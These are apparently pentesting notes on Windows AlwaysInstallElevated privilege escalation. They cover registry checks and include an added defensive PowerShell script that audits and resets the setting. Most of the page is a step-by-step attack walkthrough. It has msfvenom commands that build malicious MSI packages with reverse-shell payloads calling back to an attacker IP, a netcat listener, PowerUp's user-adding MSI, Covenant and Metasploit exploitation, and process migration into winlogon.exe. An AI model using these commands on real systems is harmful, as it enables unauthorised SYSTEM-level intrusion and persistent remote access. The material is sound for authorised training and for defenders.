# Always Installed Elevated exploitation

## Target requirements

* The target needs to have these values in the registry:
  * In `Computer\HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer`, the value `AlwaysInstallElevated` set to 1
  * In `Computer\HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\Windows\Installer`, the value `AlwaysInstallElevated` set to 1
* With both values set, Windows Installer packages are installed with elevated privileges (SYSTEM), regardless of the privileges of the user who starts the installation.

### Enumerate with cmd

* Type `reg query HKLM\Software\Policies\Microsoft\Windows\Installer` in a cmd prompt; `AlwaysInstallElevated` should be set to 1
* Type `reg query HKCU\Software\Policies\Microsoft\Windows\Installer`; it should be set to 1 as well\
  ![image](https://user-images.githubusercontent.com/96747355/162576171-430c4e05-d1be-42c4-a840-d844a87cb99e.png)
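As an added example that is not part of the original page, the following PowerShell script performs the same two checks from the defender's side: it reports whether both values are set to 1 (the condition described above) and, with the assumed `-Remediate` switch, resets both values to 0.

```powershell
# Added example (not from the original page): audit the two AlwaysInstallElevated
# values and, with -Remediate, set them to 0. Remediation needs an elevated prompt.
[CmdletBinding()]
param([switch]$Remediate)

$paths = @(
    'HKLM:\SOFTWARE\Policies\Microsoft\Windows\Installer',
    'HKCU:\SOFTWARE\Policies\Microsoft\Windows\Installer'
)

$results = foreach ($p in $paths) {
    $value = $null
    if (Test-Path $p) {
        # The value is usually absent, which is the secure default, so ignore lookup errors.
        $value = (Get-ItemProperty -Path $p -Name AlwaysInstallElevated -ErrorAction SilentlyContinue).AlwaysInstallElevated
    }
    [pscustomobject]@{
        Hive    = $p.Split(':')[0]
        Path    = $p
        Value   = $value
        Enabled = ($value -eq 1)
    }
}

$results | Format-Table Hive, Value, Enabled -AutoSize

# The weakness only exists when BOTH hives are set to 1 (the target requirement above).
$vulnerable = @($results | Where-Object { $_.Enabled }).Count -eq 2
if ($vulnerable) {
    Write-Warning 'AlwaysInstallElevated is enabled in HKLM and HKCU: any user can install an MSI as SYSTEM.'
    if ($Remediate) {
        foreach ($p in $paths) {
            # 0 disables the policy; deleting the value has the same effect.
            Set-ItemProperty -Path $p -Name AlwaysInstallElevated -Value 0 -Type DWord
        }
        Write-Host 'AlwaysInstallElevated set to 0 in both hives.'
    }
} else {
    Write-Host 'AlwaysInstallElevated is not fully enabled; this privilege escalation does not apply.'
}
```

The HKCU value is per user, so the script only audits the account it runs under; if the values come from Group Policy ("Always install with elevated privileges" under Windows Components > Windows Installer), fix the policy too or the values return at the next refresh.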

## Exploitation

* You should have a shell on the target through Covenant, Metasploit or netcat, or some other access to it.\
  We will use Covenant and Metasploit here.

### Covenant

#### Enumerate with SharpUp audit

* In your shell type `SharpUp audit`
* In the results you should see this:

  ```
  === AlwaysInstallElevated Registry Keys ===

    HKLM:    1
    HKCU:    1
  ```

#### Enumerate with powerup

* In the shell type `PowerShellImport`, press enter and select PowerUp.ps1 (if you do not have it you can get it [here](https://github.com/PowerShellMafia/PowerSploit/blob/master/Privesc/PowerUp.ps1))
* Click on execute
* Type `powershell invoke-allchecks` in your shell
* We should see this:

  ```
  [*] Checking for AlwaysInstallElevated registry key...
  AbuseFunction : Write-UserAddMSI
  ```

#### Exploitation

* Generate a payload with msfvenom: `msfvenom -p windows/exec CMD="" -f msi -o exploitalwaysinstalled.msi`. Between the quotes, paste an encoded Covenant launcher.
* Upload the file to the target using the Upload command from Covenant (type `Upload` and press enter, fill in the file path on the target and browse to the file on your attack machine)
* Run it using `shell msiexec /quiet /qn /i exploitalwaysinstalled.msi`
* A new Grunt should check in, running as an elevated user:

  ```
  > whoami
  NT AUTHORITY\SYSTEM
  ```

#### Exploitation with powerup

* `powershell -ep bypass`
* `. .\PowerUp.ps1`
* `Write-UserAddMSI`
* It will build an MSI called `UserAdd` that adds a user
* Run it and we will be able to add a user\
  ![image](https://user-images.githubusercontent.com/96747355/162576431-66e49563-26cd-45fc-a673-63e9f0a42561.png)
* Our user has been added\
  ![image](https://user-images.githubusercontent.com/96747355/162576458-7498d8e5-bfc7-4dba-9b5c-9a73ac869622.png)

### Metasploit

* Interact with a session you should already have from the initial foothold: `sessions -i num-of-session`

#### Enumerate

* Launch `run post/multi/recon/local_exploit_suggester`
* You should see: `- exploit/windows/local/always_install_elevated: The target is vulnerable.`

#### Exploitation

* Background your session with Ctrl+Z
* Type `use exploit/windows/local/always_install_elevated`
* Set `session` to the number of the session you have on your target
* Type `exploit -j`
* List the sessions; you should have another one running as NT AUTHORITY\SYSTEM
* Type `ps` and look for a process under session 1 so that we can migrate to it
* We can use winlogon.exe: `620 520 winlogon.exe x64 1 NT AUTHORITY\SYSTEM C:\Windows\System32\winlogon.exe`
* Migrate to it using `migrate PID-number`; in our example it is going to be `migrate 520`

**OR**

* `msfconsole`
* `use multi/handler`
* `set payload windows/meterpreter/reverse_tcp`
* `set lhost your-Kali-IP`
* `run`
* In another console tab: `msfvenom -p windows/meterpreter/reverse_tcp lhost=Your-Kali-IP -f msi -o setup.msi`
* Transfer the generated MSI to the target (for example, serve it with a Python HTTP server and download it from the target's browser)
* On the target, place `setup.msi` in a folder where you have write access
* Open a command prompt and type: `msiexec /quiet /qn /i C:\Folder\you\chose\setup.msi`
* You should get an elevated shell in msfconsole\
  ![image](https://user-images.githubusercontent.com/96747355/162576948-dfc37754-0345-408f-a344-5248975f34b8.png)

### Other way

* Generate a malicious MSI package: `msfvenom -p windows/shell_reverse_tcp lhost=IP-OF-ATTACK-MACHINE lport=PORT -f msi > file.msi`
* Set up a listener: `rlwrap nc -lnvp CHOSEN-PORT`
* Upload it to the target and execute it from cmd: `msiexec /i c:\users\user\desktop\file.msi /quiet /qn /norestart`
* You should get an elevated shell on the listener

## Resources

{% embed url="https://academy.tcm-sec.com/p/movement-pivoting-and-persistence-for-pentesters-and-ethical-hackers" %}
TCM Security Academy - Movement, Pivoting and Persistence for Pentesters and Ethical Hackers
{% endembed %}
